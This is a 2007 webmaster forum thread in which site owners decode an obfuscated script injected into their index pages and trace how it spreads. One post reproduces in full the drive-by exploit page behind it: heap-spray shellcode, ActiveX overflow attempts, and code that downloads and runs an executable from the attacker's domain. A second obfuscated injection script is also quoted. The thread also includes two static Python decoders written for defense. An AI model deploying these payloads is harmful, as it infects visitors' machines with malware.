Old 11-21-2007, 09:15 AM   #1
d-null
What is this malicious injected code all about?

I've seen this a few times in the last couple months. What does this code do that someone is injecting into the index.html code for many sites? I've cleaned it out before only to have it return again a month later. Why and how are they injecting this code?


this is what it looks like, and it seemed to try to run outlook express on one site, the other nothing seemed to happen:

<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%73%74%72%6f%6e%67 %2f%30%35%30%2f%20%77%69%64%74%68%3d%31%20%68%65%6 9%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27% 29%3b'));</script>
Old 11-21-2007, 09:19 AM   #2
who
Unescape() and escape() can be used to encode/decode parts of a script or URL or so on.
Old 11-21-2007, 09:20 AM   #3
justFred
It looks to me initially that it is trying to send some data to the hacker via e-mail.
__________________
Vote Bill Cosby 2012
Old 11-21-2007, 09:20 AM   #4
who
In your case it's:

document.write('<iframe src=http://softspydelete.com/strong/050/ width=1 height=1></iframe>');

Old 11-21-2007, 09:21 AM   #5
yahoo-xxx-girls.com
Fun with hex.

Quote:
Originally Posted by jetjet View Post
I've seen this a few times in the last couple months. What does this code do that someone is injecting into the index.html code for many sites? I've cleaned it out before only to have it return again a month later. Why and how are they injecting this code?


this is what it looks like, and it seemed to try to run outlook express on one site, the other nothing seemed to happen:

<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%73%74%72%6f%6e%67 %2f%30%35%30%2f%20%77%69%64%74%68%3d%31%20%68%65%6 9%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27% 29%3b'));</script>

Your code converts to this:

<script>eval(unescape(document.write('<iframe src=http://softspydelete.com/strong/050/ width=1 height=1></iframe>');));</script>


.
__________________
sig too big
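The hand decoding in the posts above can be done statically, with no browser involved. The Python below is an added example, not code from the thread: it finds eval(unescape('...')) blobs in page source, decodes them without executing anything, and reports iframes that are hidden (0 or 1 pixel in size, or styled invisible). The function names, the sample page and the host injected.example.invalid are constructed for illustration.

```python
import os
import re

# eval(unescape('...')) whose argument is only %xx / %uXXXX escapes. Whitespace
# is allowed inside the blob because editors and forums wrap these long strings.
EVAL_UNESCAPE = re.compile(
    r"eval\s*\(\s*unescape\s*\(\s*(['\"])([%0-9A-Fa-fuU\s]+?)\1\s*\)\s*\)")
ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
IFRAME = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR = re.compile(r"([\w-]+)\s*=\s*(\"[^\"]*\"|'[^']*'|[^\s>]+)")
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def js_unescape(blob):
    """Static equivalent of JavaScript unescape(); nothing is executed."""
    blob = re.sub(r"\s+", "", blob)
    return ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), blob)

def iframes(markup):
    """Return (src, hidden) for every iframe tag in markup."""
    found = []
    for tag in IFRAME.finditer(markup):
        attrs = {k.lower(): v.strip("'\"") for k, v in ATTR.findall(tag.group(1))}
        tiny = all(attrs.get(dim, "").rstrip("px") in ("0", "1")
                   for dim in ("width", "height"))
        hidden = tiny or bool(HIDDEN_STYLE.search(attrs.get("style", "")))
        found.append((attrs.get("src", ""), hidden))
    return found

def scan_text(text, max_layers=5):
    """Decode each eval(unescape(...)) blob, peeling nested layers."""
    findings = []
    for match in EVAL_UNESCAPE.finditer(text):
        decoded = js_unescape(match.group(2))
        for _ in range(max_layers - 1):       # bounded, in case of many layers
            inner = EVAL_UNESCAPE.search(decoded)
            if not inner:
                break
            decoded = js_unescape(inner.group(2))
        findings.append({"offset": match.start(), "decoded": decoded,
                         "iframes": iframes(decoded)})
    return findings

def scan_tree(root, exts=(".html", ".htm", ".php", ".js")):
    """Scan a web root; return {path: findings} for files with hits."""
    hits = {}
    for folder, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(exts):
                path = os.path.join(folder, name)
                with open(path, encoding="latin-1") as fh:
                    found = scan_text(fh.read())
                if found:
                    hits[path] = found
    return hits

# Constructed sample, not the payload from the thread: same shape, harmless
# host, with spaces inserted every 50 characters to imitate line wrapping.
_PAYLOAD = ("document.write('<iframe src=http://injected.example.invalid/x/ "
            "width=1 height=1></iframe>');")
_BLOB = "".join("%%%02x" % ord(ch) for ch in _PAYLOAD)
_BLOB = " ".join(_BLOB[i:i + 50] for i in range(0, len(_BLOB), 50))
SAMPLE_PAGE = ("<html><body>gallery</body></html>\n"
               "<script>eval(unescape('" + _BLOB + "'));</script>")

if __name__ == "__main__":
    for finding in scan_text(SAMPLE_PAGE):
        print(finding["offset"], finding["iframes"])
```

scan_tree() can be pointed at a local copy of the site to list every file that carries such a blob, which matters here because the posters report the same injection across many index files.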
Old 11-21-2007, 09:23 AM   #6
d-null
interesting, thanks for the replies

it's on a shared account

is there anything I should do as a user to protect against it? (permissions or something?) ...or is it something that the server admin should be taking care of?

what could a hacker possibly be hoping to achieve by injecting that in many index files (I noticed the same code in other accounts on the same server)
Old 11-21-2007, 09:30 AM   #7
d-null
interesting too, the whois for that domain shows a Russian owner with a Turkish IP
Old 11-21-2007, 09:42 AM   #8
yahoo-xxx-girls.com
http://softspydelete.com/strong/050/ (Points to the below)


<script>

var aTDnc='ae77613122a3db26313c68746d6c3e0a3c626f64793 e3c7374796c653e202a207b435552534f523a2075726c28223 332343132332e68746d6c22297d203c2f7374796c653e0a3c6 96672616d65207372633d2265312e68746d6c2220776964746 83d223122206865696768743d2231223e3c2f696672616d653 e3c2f626f64793e0a3c2f68746d6c3e3abe68ad57';
eval(unescape('%76%61%72%20%71%31%47%70%79%20%3d%2 0%27%27%3b%0a%76%61%72%20%4d%56%35%76%20%3d%20%61% 54%44%6e%63%2e%73%6c%69%63%65%20%28%20%31%38%2c%20 %32%37%34%20%29%3b%0a%66%6f%72%20%28%20%63%36%20%3 d%20%31%38%20%3b%20%63%36%20%3c%20%32%37%34%20%3b% 20%63%36%20%2b%3d%20%32%20%29%7b%0a%09%71%31%47%70 %79%20%2b%3d%20%27%25%27%20%2b%20%61%54%44%6e%63%2 e%73%6c%69%63%65%20%28%20%63%36%2c%20%63%36%20%2b% 20%32%20%29%3b%0a%7d%64%6f%63%75%6d%65%6e%74%2e%77 %72%69%74%65%28%75%6e%65%73%63%61%70%65%28%71%31%4 7%70%79%29%29%3b'));</script>



( below is how it breaks down )

--------------



var aTDnc='®wa1"£Û&1<html><body><style> * {CURSOR: url("324123.html")} </style><iframe src="e1.html" width="1" height="1"></iframe></body></html>:¾hhaW'

eval(unescape('var q1Gpy = ''; var MV5v = aTDnc.slice ( 18, 274 ); for ( c6 = 18 ; c6 < 274 ; c6 += 2 ){q1Gpy += '%' + aTDnc.slice ( c6, c6 + 2 );}document.write(unescape(q1Gpy));�'));</script>


-----

Now ( 324123.html )





------


And ( e1.html )



<html>
<body><div id="mydiv"></div><Script Language='JavaScript'>
var mm = new Array();
var mem_flag = 0;

function h() {mm=mm; setTimeout("h()", 2000);}

function getb(b, bSize)
{while (b.length*2<bSize){b += b;}
b = b.substring(0,bSize/2);return b;}

function cf()
{var zc = 0x05050505;
var a = unescape("%u9090%u9090%u9090%u9090%u00e8%u0000%u5d 00%ued81%u11ca%u0040%ucbe8%u0000%u8d00%u5a85%u4012 %ue800%u0007%u0000%u7275%u6d6c%u6e6f%ue800%u011d%u 0000%uc389%u858d%u1319%u0040%u13e8%u0000%u5500%u4c 52%u6f44%u6e77%u6f6c%u6461%u6f54%u6946%u656c%u0041 %ue853%u00f7%u0000%u9090%u8d8d%u127a%u0040%u006a%u 006a%u09e8%u0000%u6300%u5c3a%u2e74%u6e69%u0078%u6a 51%uff00%u8dd0%u6785%u4012%u6a00%ue800%u0009%u0000 %u3a63%u745c%u692e%u786e%ue800%u00bd%u0000%u858d%u 126f%u0040%u006a%ub0e8%u0000%u4c00%u616f%u4c64%u62 69%u6172%u7972%u0041%u6957%u456e%u6578%u0063%u7845 %u7469%u6854%u6572%u6461%u6800%u7474%u3a70%u2f2f%u 6f73%u7466%u7073%u6479%u6c65%u7465%u2e65%u6f63%u2f 6d%u6c64%u302f%u3035%u772f%u6e69%u3233%u652e%u6578 %u1d00%u0030%u0000%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u 8908%u89da%u289d%u4013%u8b00%u3c7b%ud701%u5f03%u8b 78%u184b%u738b%u8b20%u247b%ud601%ud701%uadfc%ud001 %u5751%u8d96%u19bd%u4013%ub900%u000f%u0000%ua6f3%u 5f96%u7459%u4706%ue247%uebe4%u31c4%u66c0%u078b%ue0 c1%u8b02%u1c73%ud601%uc601%u01ad%u89d0%u2c85%u4013 %u6100%u50c3%ub5ff%u1328%u0040%u95ff%u132c%u0040%u e0ff%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u00 00%u0000%u0000%u0000%u9000");
var heapBl2ckSize = 0x400000;
var pls = a.length * 2;
var bSize = heapBl2ckSize - (pls+0x38);
var b = unescape("%u0505%u0505"); b = getb(b,bSize);
heapBl2cks = (zc - 0x400000)/heapBl2ckSize;

for (i=0;i<heapBl2cks;i++)
{mm[i] = b + a;}

mem_flag = 1;
return mm;
}

function startWVF()
{
for (i=0;i<128;i++)
{
try{
var tar = new ActiveXObject('WebVi'+'ewFol'+'de'+'rIc'+'on.WebVi '+'ewFol'+'derI'+'con.1');
d = 0x7ffffffe;
b = 0x05050505
tar.setSlice(d, b, b, b );
}catch(e){}
}
}

function startWinZip(object)
{
var xh = 'A';
while (xh.length < 231) xh+='A';
xh+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c";
object.CreateNewFolderFromName(xh);
}

function startOverflow(num)
{
try {
var tar = new ActiveXObject('WebVi'+'ewFol'+'derIc'+'on.WebVi'+' ewFol'+'derI'+'con.1');
if (tar) {
if (! mem_flag) cf();
startWVF();
}
} catch(e) { }
}


function GetRandString(len)
{
var chars = "abcdefghiklmnopqrstuvwxyz";
var string_length = len;
var randomstring = '';
for (var i=0; i<string_length; i++) {
var rnum = Math.floor(Math.random() * chars.length);
randomstring += chars.substring(rnum,rnum+1);
}

return randomstring;
}

function CreateObject(CLSID, name) {
var r = null;
try { eval('r = CLSID.CreateObject(name)') }catch(e){}
if (!r) { try {s=1; eval('r = CLSID.CreateObject(name, "")') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.GetObject("", name)') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.GetObject(name, "")') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.GetObject(name)') }catch(e){} }
return(r);
}

function XMLHttpDownload(xml, url) {

try {
xml.open("GET", url, false);
xml.send(null);

} catch(e) { return 0; }

return xml.responseBody;
}

function AD2BDStreamSave(o, name, data) {

try {
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(data);
o.SaveToFile(name, 2);
o.Close();
} catch(e) { return 0; }

return 1;
}

function ShellExecute(exec, name, type) {

if (type == 0) {
try { exec.Run(name, 0); return 1; } catch(e) { }
} else {
try { exe.ShellExecute(name); return 1; } catch(e) { }
}

return(0);

}

function MD2C() {
var t = new Array('{BD96C5'+'56-65A3-11'+'D0-983A-00C04FC'+'29E30}', '{BD96C'+'556-65A3-11'+'D0-983A-00C0'+'4FC29E36}', '{AB9B'+'CEDD-EC7E-47'+'E1-9322-D4A21'+'0617116}', '{0006F'+'033-0000-0000-C000-000000'+'000046}', '{0006'+'F03A-0000-0000-C000-0000000'+'00046}', '{6e32'+'070a-766d-4ee6-879c-dc1fa'+'91d2fc3}', '{6414'+'512B-B978-451D-A0D8-FCFDF3'+'3E833C}', '{7F5B'+'7F63-F06F-4331-8A26-339E03'+'C0AE3D}', '{0672'+'3E09-F4C2-43'+'c8-8358-09FCD1D'+'B0766}', '{639F'+'725F-1B2D-48'+'31-A9FD-87484'+'7682010}', '{BA018'+'599-1DB3-44f'+'9-83B4-46145'+'4C84BF8}', '{D0C07'+'D56-7C69-43F1-B4'+'A0-25F5A1'+'1FAB19}', '{E8C'+'CCDDF-CA28-496b-B'+'050-6C07C962'+'476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe = 'http://softspydelete.com/dl/050/win32.exe';

while (t[i] && (! v[0] || ! v[1] || ! v[2]) ) {
var a = null;

try {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} catch(e) { a = null; }

if (a) {
if (! v[0]) {
v[0] = CreateObject(a, "msxml2.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "Microso"+"ft.XM"+"LHT"+"TP");
if (! v[0]) v[0] = CreateObject(a, "MSX"+"ML2.Se"+"rverXM"+"LHT"+"TP");
}

if (! v[1]) {
v[1] = CreateObject(a, "ADOD"+"B.Str"+"eam");
}

if (! v[2]) {
v[2] = CreateObject(a, "WSc"+"ript.Sh"+"ell");
if (! v[2]) {
v[2] = CreateObject(a, "Shel"+"l.Ap"+"pl"+"icati"+"on");
if (v[2]) n=1;
}
}
}

i++;
}

if (v[0] && v[1] && v[2]) {
var data = XMLHttpDownload(v[0], urlRealExe);
if (data != 0) {
var name = "c:\\sys"+GetRandString(4)+".exe";
if (AD2BDStreamSave(v[1], name, data) == 1) {
if (ShellExecute(v[2], name, n) == 1) {
ret=1;
}
}
}
}

return ret;
}

function start() {

if (! MD2C() ) { startOverflow(0); }

}

start();
</script></body>
</html>
__________________
sig too big
Old 11-21-2007, 09:47 AM   #9
StarkReality
Ok, so the short version means: A trojan (installer) using activex to sneak on the system, disguised as a windows system file ?!
Old 11-21-2007, 09:49 AM   #10
d-null
awesome followthrough

so anyone have any theories to what they would be trying to achieve with this?

I just went and checked another server at a completely different data center and found the same code (or similar code, I deleted it before analyzing it exactly)
Old 11-21-2007, 09:50 AM   #11
ClickBuster
that IFRAME is loading a page, that executes an exploit, that uploads a trojan... it's much better to redirect to a 3rd party page in case you want to update your exploit code... nasty shit, dealt with something similar a few weeks ago, had to cleanse several thousand pages
__________________
-- ClickBuster
-- ICQ# 263653704
-- Email: clickbuster1 [-at-] gmail [-dot-] com
Old 11-21-2007, 09:53 AM   #12
SmokeyTheBear
Quote:
Originally Posted by jetjet View Post
awesome followthrough

so anyone have any theories to what they would be trying to achieve with this?

I just went and checked another server at a completely different data center and found the same code (or similar code, I deleted it before analyzing it exactly)
infecting people with spyware.

is the code hardwritten into the page ( like do you see it by ftp or only by browser )
__________________
hatisblack at yahoo.com
Old 11-21-2007, 09:56 AM   #13
d-null
the code made it hardwritten into my index.html files on completely separate datacenters
Old 11-21-2007, 09:57 AM   #14
yahoo-xxx-girls.com
---------------------------------------------------------


http://softspydelete.com



softspydelete.com. NS 3600 ns2.trdns.biz.
softspydelete.com. NS 3600 ns1.trdns.biz.
softspydelete.com. A 3600 88.255.90.253




----------------

Searching for ns1.trdns.biz. A record at B.ROOT-SERVERS.NET. [192.228.79.201] ...took 156 ms
Searching for ns1.trdns.biz. A record at A.GTLD.biz. [209.173.53.162] ...took 93 ms
Searching for ns1.trdns.biz. A record at NS2.trdns.biz. [88.255.90.252] ...took 120 ms

A record found: 88.255.90.251
Domain Type TTL Answer
ns1.trdns.biz. A 3600 88.255.90.251

----------------



----------------


Searching for ns1.trdns.biz. A record at E.ROOT-SERVERS.NET. [192.203.230.10] ...took 177 ms
Searching for ns1.trdns.biz. A record at H.GTLD.biz. [199.7.77.126] ...took 10 ms
Searching for ns1.trdns.biz. A record at ns1.trdns.biz. [88.255.90.251] ...took 120 ms

A record found: 88.255.90.251
Domain Type TTL Answer
ns1.trdns.biz. A 3600 88.255.90.251



----------------
__________________
sig too big
Old 11-21-2007, 10:00 AM   #15
yahoo-xxx-girls.com
Quote:
Originally Posted by jetjet View Post
awesome followthrough

so anyone have any theories to what they would be trying to achieve with this?

I just went and checked another server at a completely different data center and found the same code (or similar code, I deleted it before analyzing it exactly)

Perhaps a root kit as to attack others' systems or perhaps spam...


.
__________________
sig too big
Old 11-21-2007, 10:06 AM   #16
Spudman
Quote:
Originally Posted by jetjet View Post
the code made it hardwritten into my index.html files on completely separate datacenters

i have been getting this code for about a month now and have only just resolved the issue with webair's help. if you simply remove the code from your index pages it comes back, did with me anyways.

i think it came from an exploit in a script i was using, i have removed the script and remade all affected webpages and it's fine so far, fingers crossed
__________________
Take it Easy !!!
Old 11-21-2007, 10:10 AM   #17
yahoo-xxx-girls.com
Spudman how exactly did this code get onto webair servers to begin with ?

.
__________________
sig too big
Old 11-21-2007, 10:18 AM   #18
ClickBuster
Quote:
Originally Posted by Balalsubturfyooj View Post
Spudman how exactly did this code get onto webair servers to begin with ?

.
He said that he had a vulnerable script
__________________
-- ClickBuster
-- ICQ# 263653704
-- Email: clickbuster1 [-at-] gmail [-dot-] com
Old 11-21-2007, 10:20 AM   #19
Spudman
Quote:
Originally Posted by Balalsubturfyooj View Post
Spudman how exactly did this code get onto webair servers to begin with ?

.
i dunno balal, i got a dedicated box, the code got on it somehow, i think through one of the scripts i use, and it got on every index.html page i have and if i removed it, it simply came back, at first it seemed to just bring up the outlook.exe popup but then it really started fucking my pages up so i've practically deleted everything and started again.

the scripts i was running on my box were:
e107
comus
TM3
TTTv4
and some photo gallery software.

maybe through one of those,

i've checked and amended any permissions on all my pages, also renamed all templates that come with scripts (i should have done this before anyways, just lazy) and so far i seem clean again.
__________________
Take it Easy !!!
Old 11-21-2007, 10:59 AM   #20
yahoo-xxx-girls.com
Perhaps someone attached a misc code to an image file?

If you run a virus scanner on your server it might be a good idea...

Later,
__________________
sig too big
Old 11-21-2007, 05:23 PM   #21
RegUser
I remember a similar code infecting tonnes of sites out there. It reinfects html pages within days if cleaned.
I was under the impression that it happens because of a vulnerability with windows virtual machine but am not sure how to prevent it. Does anyone know what causes this and how to fix it.....keep in mind that it propagates via internet.

<script language="JavaScript">e = '0x00' + '56';str1 = "&#37;ED%B5%BE%A3%C9%A4%A5%AE%BD%B2%EA%F7%A3%BE%A4 %BE%B7%BE%BD%BE%A5%AE%EF%B1%BE%B5%B5%B2%BB%F7%EB%E D%BE%B3%A7%B6%BA%B2%C9%A4%A7%B4%EA%F7%B1%A5%A5%B9% EF%F8%F8%A7%BE%BC%B8%B4%BB%A5%FB%BE%BB%B3%B8%F8%BD %B5%F8%B0%A7%B2%AE%F8%F7%C9%A0%BE%B5%A5%B1%EA%E6%C 9%B1%B2%BE%B0%B1%A5%EA%E6%EB%ED%F8%BE%B3%A7%B6%BA% B2%EB%ED%F8%B5%BE%A3%EB";str=tmp='';for(i=0;i<str1 .length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>
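The script posted above hides its markup behind a per-character XOR and subtraction rather than a plain unescape(). The Python below is an added example, not code from the thread: a static decoder for that scheme, generalized to try every single-byte key and offset for variants where the two values are not readable in the script. The sample blob and host are constructed, and decode() takes the subtraction modulo 256, an assumption that agrees with the posted script whenever the output is ASCII.

```python
import html
import re

ESC = re.compile(r"%([0-9A-Fa-f]{2})")
MARKERS = ("<iframe", "<script", "<object")


def blob_codes(blob):
    """Turn a %XX string into integers; nothing is executed.

    HTML entities (&#37; for %) and whitespace from line wrapping are undone
    first, since copies of these scripts are often mangled that way.
    """
    cleaned = re.sub(r"\s+", "", html.unescape(blob))
    return [int(h, 16) for h in ESC.findall(cleaned)]


def decode(codes, key, offset):
    """Static mirror of String.fromCharCode((code ^ key) - offset)."""
    return "".join(chr(((c ^ key) - offset) % 256) for c in codes)


def printable(text):
    return all(32 <= ord(ch) < 127 for ch in text)


def search(codes):
    """Try all 256 x 256 key/offset pairs; return {plaintext: [(key, offset)]}.

    A candidate is kept only if every character is printable ASCII and the
    text contains a tag an injector would write. Several pairs can yield the
    same plaintext, so results are grouped by text.
    """
    hits = {}
    if not codes:
        return hits
    for key in range(256):
        for offset in range(256):
            if not 32 <= ((codes[0] ^ key) - offset) % 256 < 127:
                continue                      # cheap reject on first char
            text = decode(codes, key, offset)
            if printable(text) and any(m in text.lower() for m in MARKERS):
                hits.setdefault(text, []).append((key, offset))
    return hits


# Constructed sample: harmless markup encoded the way the posted script expects
# (key 0x56, offset 127), then mangled with an entity and wrap spaces.
PLAIN = "<iframe src=http://injected.example.invalid/x/ width=1 height=1></iframe>"
_raw = "".join("%%%02X" % ((ord(ch) + 127) ^ 0x56) for ch in PLAIN)
SAMPLE = "&#37;" + " ".join(_raw[i:i + 50] for i in range(1, len(_raw), 50))

if __name__ == "__main__":
    for text, pairs in search(blob_codes(SAMPLE)).items():
        print(pairs[0], text)
```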
Old 11-21-2007, 05:46 PM   #22
AlienQ - BANNED FOR LIFE
I had the same problem for a while it is usually inserted via a database on your own server. Secure the Data sources or remove unused ones, clear the index.html.

I worked with SplitInfinity to solve my problem hit up your host and check with them to get it flushed.
Old 11-21-2007, 05:51 PM   #23
minusonebit
Goddamn that is sneaky.
Old 11-21-2007, 06:11 PM   #24
madfuck
idk, hummm i have NO idea???? good question
Old 11-22-2007, 04:58 PM   #25
RegUser
i think it is an iframe that injects the code and resides as a .js file on the server.